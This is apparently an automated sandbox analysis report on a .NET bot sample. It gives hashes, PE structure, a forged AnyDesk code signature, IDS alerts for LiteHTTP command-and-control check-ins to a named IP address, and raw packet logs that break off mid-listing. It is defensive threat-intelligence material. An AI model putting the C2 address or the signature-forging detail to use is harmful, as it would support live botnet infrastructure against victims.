                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v(.g..............0.............n.... ........@.. .......................@............`.....................................W.......*...............HQ... ....................................................... ............... ..H............text...t.... ...................... ..`.rsrc...*...........................@..@.reloc....... ......................@..B................P.......H........=..........J.....................................................r...e..s-p#..Ez../8T.&L..B..8..7..h.....Cd.$Yd..y...'...w,vK.q....j..>.#...e..0S......=L.........s..q,.Y..".....f{..<......?|..*l......:..e....;c..e&.....To.LB.'.U..X.s.k..>K..6...`. B...|.t.0....q4......8.QH*..*........5.l;{.`......^k,.zRCW.9.c.J.L..f,j..]s..}..o..$.Ph.e.VY'^.>.iy.Q....B.%R.+)...D..A.2.{..(.........q-r.g...T.&nM|............!.n../.fIF.Lj>..SF..5`.5....5Xx:.....C....|"..

                                    C:\Users\user\OneDrive\windowspowershell.exe:Zone.Identifier

                                    Download File
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:modified
                                    Size (bytes):26
                                    Entropy (8bit):3.95006375643621
                                    Encrypted:false
                                    SSDEEP:3:ggPYV:rPYV
                                    MD5:187F488E27DB4AF347237FE461A079AD
                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                    Malicious:false
                                    Preview:[ZoneTransfer]....ZoneId=0

                                    Static File Info

                                    General

                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Entropy (8bit):5.98628667033645
                                    TrID:
                                    • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                    • Win32 Executable (generic) a (10002005/4) 49.97%
                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                    • DOS Executable Generic (2002/1) 0.01%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:3u8A2xjbBT.exe
                                    File size:213'832 bytes
                                    MD5:8391d3b5332c4b1164333ddce388a8c7
                                    SHA1:b982fc92ed38565debf033b0ffaa2181a8caa5e7
                                    SHA256:e201e9a5c9fd3a68f54e2ada061a242df3ed813e56d2b09e2c8efc04953c2f72
                                    SHA512:f42b0ec317a534af6239ec7bfb6ff22e4e3e8abf0316b9a0666b073212f4ba6d989ddce2d40d0ea460e85b245b8637b1801bbf6ca5de9944171af3134cca2c96
                                    SSDEEP:6144:UbqlnFfmUszBnDo8zbKTYUDRpzX4A7dnWldUTYFF9i8WnI:j6dn2TYUDRpzX4A7dnWldUTYFF9i8WnI
                                    TLSH:4F24FD9C766071DFC85BC876DEA81C64EA60747B931B9203A06716EDDE0D99BCF180F2
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v(.g..............0.............n.... ........@.. .......................@............`................................

                                    File Icon

                                    Icon Hash:889669d8d8299628

                                    Static PE Info

                                    General

                                    Entrypoint:0x42ff6e
                                    Entrypoint Section:.text
                                    Digitally signed:true
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                    Time Stamp:0x67102876 [Wed Oct 16 20:56:22 2024 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:4
                                    OS Version Minor:0
                                    File Version Major:4
                                    File Version Minor:0
                                    Subsystem Version Major:4
                                    Subsystem Version Minor:0
                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                    Authenticode Signature

                                    Signature Valid:false
                                    Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                    Signature Validation Error:The digital signature of the object did not verify
                                    Error Number:-2146869232
                                    Not Before, Not After
                                    • 12/02/2024 01:00:00 13/02/2025 00:59:59
                                    Subject Chain
                                    • CN=AnyDesk Software GmbH, O=AnyDesk Software GmbH, L=Stuttgart, S=Baden-W\xfcrttemberg, C=DE
                                    Version:3
                                    Thumbprint MD5:E4E34304F4315A15A0BC0E413363721E
                                    Thumbprint SHA-1:CA38CF219C8E9782A8CBBD76643D24E4F2D74B03
                                    Thumbprint SHA-256:AF74DC88EF91477F8A93E5DA98B3C80ECD6CB6A10271DC6DC768EC3F34239BC0
                                    Serial:030E330A8ED28347BDA3BB478E410D7C

                                    Entrypoint Preview

                                    Instruction
                                    jmp dword ptr [00402000h]
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add al, 00h
                                    add eax, dword ptr [eax]
                                    add byte ptr [eax], al
                                    xor byte ptr [eax], al
                                    add byte ptr [eax+0000000Eh], al
                                    pushad
                                    add byte ptr [eax], al
                                    adc byte ptr [eax], 00000000h
                                    add byte ptr [eax], al
                                    nop
                                    add byte ptr [eax], al
                                    sbb byte ptr [eax], 00000000h
                                    add byte ptr [eax], al
                                    rol byte ptr [eax], 00000000h
                                    add byte ptr [eax], 00000000h
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al

                                    Data Directories

                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x2ff140x57.text
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x300000xd2a.rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x2f2000x5148
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x320000xc.reloc
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                    Sections

                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    .text0x20000x2df740x2e000fbf9280960dd4be3c9a7001d86775997False0.44783882472826086data5.684170404357887IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    .rsrc0x300000xd2a0xe007b963963c7becb73098827fbcd1ca2d3False0.33426339285714285data3.420638003524452IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .reloc0x320000xc0x20028820010460f6d8077e6b2c8b3524498False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                    Resources

                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                    RT_ICON0x301300x668Device independent bitmap graphic, 48 x 96 x 4, image size 00.299390243902439
                                    RT_GROUP_ICON0x307980x14data1.1
                                    RT_VERSION0x307ac0x394OpenPGP Secret Key0.39192139737991266
                                    RT_MANIFEST0x30b400x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                    Imports

                                    DLLImport
                                    mscoree.dll_CorExeMain

                                    Network Behavior

                                    Suricata IDS Alerts

                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                    2024-10-30T12:23:14.597901+01002830238ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent1192.168.2.74997587.120.126.580TCP
                                    2024-10-30T12:23:15.081287+01002819705ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin1192.168.2.74997587.120.126.580TCP
                                    2024-10-30T12:23:15.081287+01002829909ETPRO MALWARE LiteHTTP Bot CnC Checkin M21192.168.2.74997587.120.126.580TCP
                                    2024-10-30T12:23:38.754593+01002830238ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent1192.168.2.74997687.120.126.580TCP
                                    2024-10-30T12:23:39.251162+01002819705ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin1192.168.2.74997687.120.126.580TCP
                                    2024-10-30T12:23:39.251162+01002829909ETPRO MALWARE LiteHTTP Bot CnC Checkin M21192.168.2.74997687.120.126.580TCP
                                    2024-10-30T12:23:54.035524+01002830238ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent1192.168.2.74997787.120.126.580TCP
                                    2024-10-30T12:23:54.521460+01002819705ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin1192.168.2.74997787.120.126.580TCP
                                    2024-10-30T12:23:54.521460+01002829909ETPRO MALWARE LiteHTTP Bot CnC Checkin M21192.168.2.74997787.120.126.580TCP
                                    2024-10-30T12:23:59.675540+01002830238ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent1192.168.2.74997887.120.126.580TCP
                                    2024-10-30T12:24:00.190004+01002819705ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin1192.168.2.74997887.120.126.580TCP
                                    2024-10-30T12:24:00.190004+01002829909ETPRO MALWARE LiteHTTP Bot CnC Checkin M21192.168.2.74997887.120.126.580TCP
                                    2024-10-30T12:24:03.014359+01002830238ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent1192.168.2.74997987.120.126.580TCP
                                    2024-10-30T12:24:03.486759+01002819705ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin1192.168.2.74997987.120.126.580TCP
                                    2024-10-30T12:24:03.486759+01002829909ETPRO MALWARE LiteHTTP Bot CnC Checkin M21192.168.2.74997987.120.126.580TCP
                                    2024-10-30T12:24:09.706769+01002830238ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent1192.168.2.74998087.120.126.580TCP
                                    2024-10-30T12:24:10.200258+01002819705ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin1192.168.2.74998087.120.126.580TCP
                                    2024-10-30T12:24:10.200258+01002829909ETPRO MALWARE LiteHTTP Bot CnC Checkin M21192.168.2.74998087.120.126.580TCP
                                    2024-10-30T12:24:15.115758+01002830238ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent1192.168.2.74998187.120.126.580TCP
                                    2024-10-30T12:24:15.603728+01002819705ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin1192.168.2.74998187.120.126.580TCP
                                    2024-10-30T12:24:15.603728+01002829909ETPRO MALWARE LiteHTTP Bot CnC Checkin M21192.168.2.74998187.120.126.580TCP
                                    2024-10-30T12:24:17.472443+01002830238ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent1192.168.2.74998287.120.126.580TCP
                                    2024-10-30T12:24:17.950436+01002819705ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin1192.168.2.74998287.120.126.580TCP
                                    2024-10-30T12:24:17.950436+01002829909ETPRO MALWARE LiteHTTP Bot CnC Checkin M21192.168.2.74998287.120.126.580TCP
                                    2024-10-30T12:24:20.567020+01002830238ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent1192.168.2.74998387.120.126.580TCP
                                    2024-10-30T12:24:21.045117+01002819705ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin1192.168.2.74998387.120.126.580TCP
                                    2024-10-30T12:24:21.045117+01002829909ETPRO MALWARE LiteHTTP Bot CnC Checkin M21192.168.2.74998387.120.126.580TCP
                                    2024-10-30T12:24:25.847443+01002830238ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent1192.168.2.74998487.120.126.580TCP
                                    2024-10-30T12:24:26.317282+01002819705ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin1192.168.2.74998487.120.126.580TCP
                                    2024-10-30T12:24:26.317282+01002829909ETPRO MALWARE LiteHTTP Bot CnC Checkin M21192.168.2.74998487.120.126.580TCP
                                    2024-10-30T12:24:29.322052+01002830238ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent1192.168.2.74998587.120.126.580TCP
                                    2024-10-30T12:24:29.796910+01002819705ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin1192.168.2.74998587.120.126.580TCP
                                    2024-10-30T12:24:29.796910+01002829909ETPRO MALWARE LiteHTTP Bot CnC Checkin M21192.168.2.74998587.120.126.580TCP
                                    2024-10-30T12:24:41.675648+01002830238ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent1192.168.2.74998687.120.126.580TCP
                                    2024-10-30T12:24:42.147037+01002819705ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin1192.168.2.74998687.120.126.580TCP
                                    2024-10-30T12:24:42.147037+01002829909ETPRO MALWARE LiteHTTP Bot CnC Checkin M21192.168.2.74998687.120.126.580TCP
                                    2024-10-30T12:24:56.410071+01002830238ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent1192.168.2.74998787.120.126.580TCP
                                    2024-10-30T12:24:57.056047+01002819705ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin1192.168.2.74998787.120.126.580TCP
                                    2024-10-30T12:24:57.056047+01002829909ETPRO MALWARE LiteHTTP Bot CnC Checkin M21192.168.2.74998787.120.126.580TCP
                                    2024-10-30T12:24:57.707786+01002830238ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent1192.168.2.74998887.120.126.580TCP
                                    2024-10-30T12:24:58.222260+01002819705ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin1192.168.2.74998887.120.126.580TCP
                                    2024-10-30T12:24:58.222260+01002829909ETPRO MALWARE LiteHTTP Bot CnC Checkin M21192.168.2.74998887.120.126.580TCP
                                    2024-10-30T12:25:10.113371+01002830238ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent1192.168.2.74998987.120.126.580TCP
                                    2024-10-30T12:25:10.457150+01002830238ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent1192.168.2.74999087.120.126.580TCP
                                    2024-10-30T12:25:10.614517+01002819705ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin1192.168.2.74998987.120.126.580TCP
                                    2024-10-30T12:25:10.614517+01002829909ETPRO MALWARE LiteHTTP Bot CnC Checkin M21192.168.2.74998987.120.126.580TCP
                                    2024-10-30T12:25:10.962118+01002819705ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin1192.168.2.74999087.120.126.580TCP
                                    2024-10-30T12:25:10.962118+01002829909ETPRO MALWARE LiteHTTP Bot CnC Checkin M21192.168.2.74999087.120.126.580TCP
                                    2024-10-30T12:25:17.613322+01002830238ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent1192.168.2.74999187.120.126.580TCP
                                    2024-10-30T12:25:18.093468+01002819705ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin1192.168.2.74999187.120.126.580TCP
                                    2024-10-30T12:25:18.093468+01002829909ETPRO MALWARE LiteHTTP Bot CnC Checkin M21192.168.2.74999187.120.126.580TCP
                                    2024-10-30T12:25:19.847638+01002830238ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent1192.168.2.74999287.120.126.580TCP
                                    2024-10-30T12:25:20.331614+01002819705ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin1192.168.2.74999287.120.126.580TCP
                                    2024-10-30T12:25:20.331614+01002829909ETPRO MALWARE LiteHTTP Bot CnC Checkin M21192.168.2.74999287.120.126.580TCP
                                    2024-10-30T12:25:33.535198+01002830238ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent1192.168.2.74999387.120.126.580TCP
                                    2024-10-30T12:25:34.013526+01002819705ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin1192.168.2.74999387.120.126.580TCP
                                    2024-10-30T12:25:34.013526+01002829909ETPRO MALWARE LiteHTTP Bot CnC Checkin M21192.168.2.74999387.120.126.580TCP
                                    2024-10-30T12:25:37.035238+01002830238ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent1192.168.2.74999487.120.126.580TCP
                                    2024-10-30T12:25:37.547049+01002819705ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin1192.168.2.74999487.120.126.580TCP
                                    2024-10-30T12:25:37.547049+01002829909ETPRO MALWARE LiteHTTP Bot CnC Checkin M21192.168.2.74999487.120.126.580TCP
                                    2024-10-30T12:25:49.316513+01002830238ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent1192.168.2.74999587.120.126.580TCP
                                    2024-10-30T12:25:49.828720+01002819705ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin1192.168.2.74999587.120.126.580TCP
                                    2024-10-30T12:25:49.828720+01002829909ETPRO MALWARE LiteHTTP Bot CnC Checkin M21192.168.2.74999587.120.126.580TCP
                                    2024-10-30T12:25:53.426019+01002830238ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent1192.168.2.74999687.120.126.580TCP
                                    2024-10-30T12:25:53.473267+01002830238ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent1192.168.2.74999787.120.126.580TCP
                                    2024-10-30T12:25:53.892869+01002819705ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin1192.168.2.74999687.120.126.580TCP
                                    2024-10-30T12:25:53.892869+01002829909ETPRO MALWARE LiteHTTP Bot CnC Checkin M21192.168.2.74999687.120.126.580TCP
                                    2024-10-30T12:25:53.961069+01002819705ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin1192.168.2.74999787.120.126.580TCP
                                    2024-10-30T12:25:53.961069+01002829909ETPRO MALWARE LiteHTTP Bot CnC Checkin M21192.168.2.74999787.120.126.580TCP
                                    2024-10-30T12:26:00.633144+01002830238ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent1192.168.2.74999887.120.126.580TCP
                                    2024-10-30T12:26:01.097855+01002819705ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin1192.168.2.74999887.120.126.580TCP
                                    2024-10-30T12:26:01.097855+01002829909ETPRO MALWARE LiteHTTP Bot CnC Checkin M21192.168.2.74999887.120.126.580TCP
                                    2024-10-30T12:26:14.160383+01002830238ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent1192.168.2.74999987.120.126.580TCP
                                    2024-10-30T12:26:14.651363+01002819705ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin1192.168.2.74999987.120.126.580TCP
                                    2024-10-30T12:26:14.651363+01002829909ETPRO MALWARE LiteHTTP Bot CnC Checkin M21192.168.2.74999987.120.126.580TCP
                                    2024-10-30T12:26:18.597880+01002830238ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent1192.168.2.75000087.120.126.580TCP
                                    2024-10-30T12:26:19.087674+01002819705ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin1192.168.2.75000087.120.126.580TCP
                                    2024-10-30T12:26:19.087674+01002829909ETPRO MALWARE LiteHTTP Bot CnC Checkin M21192.168.2.75000087.120.126.580TCP

                                    Network Port Distribution

                                    TCP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Oct 30, 2024 12:23:14.240521908 CET4997580192.168.2.787.120.126.5
                                    Oct 30, 2024 12:23:14.246052980 CET804997587.120.126.5192.168.2.7
                                    Oct 30, 2024 12:23:14.246284962 CET4997580192.168.2.787.120.126.5
                                    Oct 30, 2024 12:23:14.246436119 CET4997580192.168.2.787.120.126.5
                                    Oct 30, 2024 12:23:14.252007008 CET804997587.120.126.5192.168.2.7
                                    Oct 30, 2024 12:23:14.597901106 CET4997580192.168.2.787.120.126.5
                                    Oct 30, 2024 12:23:14.605413914 CET804997587.120.126.5192.168.2.7
                                    Oct 30, 2024 12:23:15.064409018 CET804997587.120.126.5192.168.2.7
                                    Oct 30, 2024 12:23:15.081238031 CET804997587.120.126.5192.168.2.7
                                    Oct 30, 2024 12:23:15.081286907 CET4997580192.168.2.787.120.126.5
                                    Oct 30, 2024 12:23:38.401519060 CET4997580192.168.2.787.120.126.5
                                    Oct 30, 2024 12:23:38.402178049 CET4997680192.168.2.787.120.126.5
                                    Oct 30, 2024 12:23:38.407644987 CET804997687.120.126.5192.168.2.7
                                    Oct 30, 2024 12:23:38.407661915 CET804997587.120.126.5192.168.2.7
                                    Oct 30, 2024 12:23:38.407783985 CET4997580192.168.2.787.120.126.5
                                    Oct 30, 2024 12:23:38.407799959 CET4997680192.168.2.787.120.126.5
                                    Oct 30, 2024 12:23:38.407999992 CET4997680192.168.2.787.120.126.5
                                    Oct 30, 2024 12:23:38.413294077 CET804997687.120.126.5192.168.2.7
                                    Oct 30, 2024 12:23:38.754592896 CET4997680192.168.2.787.120.126.5
                                    Oct 30, 2024 12:23:38.761385918 CET804997687.120.126.5192.168.2.7
                                    Oct 30, 2024 12:23:39.230674028 CET804997687.120.126.5192.168.2.7
                                    Oct 30, 2024 12:23:39.251087904 CET804997687.120.126.5192.168.2.7
                                    Oct 30, 2024 12:23:39.251162052 CET4997680192.168.2.787.120.126.5
                                    Oct 30, 2024 12:23:53.672950983 CET4997780192.168.2.787.120.126.5
                                    Oct 30, 2024 12:23:53.678477049 CET804997787.120.126.5192.168.2.7
                                    Oct 30, 2024 12:23:53.678632021 CET4997780192.168.2.787.120.126.5
                                    Oct 30, 2024 12:23:53.679069042 CET4997780192.168.2.787.120.126.5
                                    Oct 30, 2024 12:23:53.684437990 CET804997787.120.126.5192.168.2.7
                                    Oct 30, 2024 12:23:54.035523891 CET4997780192.168.2.787.120.126.5
                                    Oct 30, 2024 12:23:54.041094065 CET804997787.120.126.5192.168.2.7
                                    Oct 30, 2024 12:23:54.500469923 CET804997787.120.126.5192.168.2.7
                                    Oct 30, 2024 12:23:54.521398067 CET804997787.120.126.5192.168.2.7
                                    Oct 30, 2024 12:23:54.521460056 CET4997780192.168.2.787.120.126.5
                                    Oct 30, 2024 12:23:59.323684931 CET4997880192.168.2.787.120.126.5
                                    Oct 30, 2024 12:23:59.329277992 CET804997887.120.126.5192.168.2.7
                                    Oct 30, 2024 12:23:59.329528093 CET4997880192.168.2.787.120.126.5
                                    Oct 30, 2024 12:23:59.329658985 CET4997880192.168.2.787.120.126.5
                                    Oct 30, 2024 12:23:59.335021019 CET804997887.120.126.5192.168.2.7
                                    Oct 30, 2024 12:23:59.675539970 CET4997880192.168.2.787.120.126.5
                                    Oct 30, 2024 12:23:59.684448957 CET804997887.120.126.5192.168.2.7
                                    Oct 30, 2024 12:24:00.173748016 CET804997887.120.126.5192.168.2.7
                                    Oct 30, 2024 12:24:00.189933062 CET804997887.120.126.5192.168.2.7
                                    Oct 30, 2024 12:24:00.190004110 CET4997880192.168.2.787.120.126.5
                                    Oct 30, 2024 12:24:02.648613930 CET4997980192.168.2.787.120.126.5
                                    Oct 30, 2024 12:24:02.654165030 CET804997987.120.126.5192.168.2.7
                                    Oct 30, 2024 12:24:02.654243946 CET4997980192.168.2.787.120.126.5
                                    Oct 30, 2024 12:24:02.654419899 CET4997980192.168.2.787.120.126.5
                                    Oct 30, 2024 12:24:02.659761906 CET804997987.120.126.5192.168.2.7
                                    Oct 30, 2024 12:24:03.014358997 CET4997980192.168.2.787.120.126.5
                                    Oct 30, 2024 12:24:03.209230900 CET804997987.120.126.5192.168.2.7
                                    Oct 30, 2024 12:24:03.476713896 CET804997987.120.126.5192.168.2.7
                                    Oct 30, 2024 12:24:03.485270977 CET804997987.120.126.5192.168.2.7
                                    Oct 30, 2024 12:24:03.486758947 CET4997980192.168.2.787.120.126.5
                                    Oct 30, 2024 12:24:09.348197937 CET4997980192.168.2.787.120.126.5
                                    Oct 30, 2024 12:24:09.348768950 CET4998080192.168.2.787.120.126.5
                                    Oct 30, 2024 12:24:09.353951931 CET804997987.120.126.5192.168.2.7
                                    Oct 30, 2024 12:24:09.354026079 CET4997980192.168.2.787.120.126.5
                                    Oct 30, 2024 12:24:09.354058027 CET804998087.120.126.5192.168.2.7
                                    Oct 30, 2024 12:24:09.354217052 CET4998080192.168.2.787.120.126.5
                                    Oct 30, 2024 12:24:09.354286909 CET4998080192.168.2.787.120.126.5
                                    Oct 30, 2024 12:24:09.359564066 CET804998087.120.126.5192.168.2.7
                                    Oct 30, 2024 12:24:09.706768990 CET4998080192.168.2.787.120.126.5
                                    Oct 30, 2024 12:24:09.712212086 CET804998087.120.126.5192.168.2.7
                                    Oct 30, 2024 12:24:10.187701941 CET804998087.120.126.5192.168.2.7
                                    Oct 30, 2024 12:24:10.200161934 CET804998087.120.126.5192.168.2.7
                                    Oct 30, 2024 12:24:10.200258017 CET4998080192.168.2.787.120.126.5
                                    Oct 30, 2024 12:24:14.754209042 CET4997780192.168.2.787.120.126.5
                                    Oct 30, 2024 12:24:14.754606009 CET4998180192.168.2.787.120.126.5
                                    Oct 30, 2024 12:24:14.760034084 CET804998187.120.126.5192.168.2.7
                                    Oct 30, 2024 12:24:14.760102987 CET4998180192.168.2.787.120.126.5
                                    Oct 30, 2024 12:24:14.760109901 CET804997787.120.126.5192.168.2.7
                                    Oct 30, 2024 12:24:14.760157108 CET4997780192.168.2.787.120.126.5
                                    Oct 30, 2024 12:24:14.760262966 CET4998180192.168.2.787.120.126.5
                                    Oct 30, 2024 12:24:14.765605927 CET804998187.120.126.5192.168.2.7
                                    Oct 30, 2024 12:24:15.115757942 CET4998180192.168.2.787.120.126.5
                                    Oct 30, 2024 12:24:15.121275902 CET804998187.120.126.5192.168.2.7
                                    Oct 30, 2024 12:24:15.583427906 CET804998187.120.126.5192.168.2.7
                                    Oct 30, 2024 12:24:15.599507093 CET804998187.120.126.5192.168.2.7
                                    Oct 30, 2024 12:24:15.603728056 CET4998180192.168.2.787.120.126.5
                                    Oct 30, 2024 12:24:17.114083052 CET4997880192.168.2.787.120.126.5
                                    Oct 30, 2024 12:24:17.114471912 CET4998280192.168.2.787.120.126.5
                                    Oct 30, 2024 12:24:17.121407032 CET804998287.120.126.5192.168.2.7
                                    Oct 30, 2024 12:24:17.121423006 CET804997887.120.126.5192.168.2.7
                                    Oct 30, 2024 12:24:17.121510983 CET4997880192.168.2.787.120.126.5
                                    Oct 30, 2024 12:24:17.121541023 CET4998280192.168.2.787.120.126.5
                                    Oct 30, 2024 12:24:17.121619940 CET4998280192.168.2.787.120.126.5
                                    Oct 30, 2024 12:24:17.126996994 CET804998287.120.126.5192.168.2.7
                                    Oct 30, 2024 12:24:17.472443104 CET4998280192.168.2.787.120.126.5
                                    Oct 30, 2024 12:24:17.478540897 CET804998287.120.126.5192.168.2.7
                                    Oct 30, 2024 12:24:17.936234951 CET804998287.120.126.5192.168.2.7
                                    Oct 30, 2024 12:24:17.950364113 CET804998287.120.126.5192.168.2.7
                                    Oct 30, 2024 12:24:17.950436115 CET4998280192.168.2.787.120.126.5
                                    Oct 30, 2024 12:24:17.950706959 CET4998280192.168.2.787.120.126.5
                                    Oct 30, 2024 12:24:17.956944942 CET804998287.120.126.5192.168.2.7
                                    Oct 30, 2024 12:24:17.957072020 CET4998280192.168.2.787.120.126.5
                                    Oct 30, 2024 12:24:20.207367897 CET4998080192.168.2.787.120.126.5
                                    Oct 30, 2024 12:24:20.207724094 CET4998380192.168.2.787.120.126.5
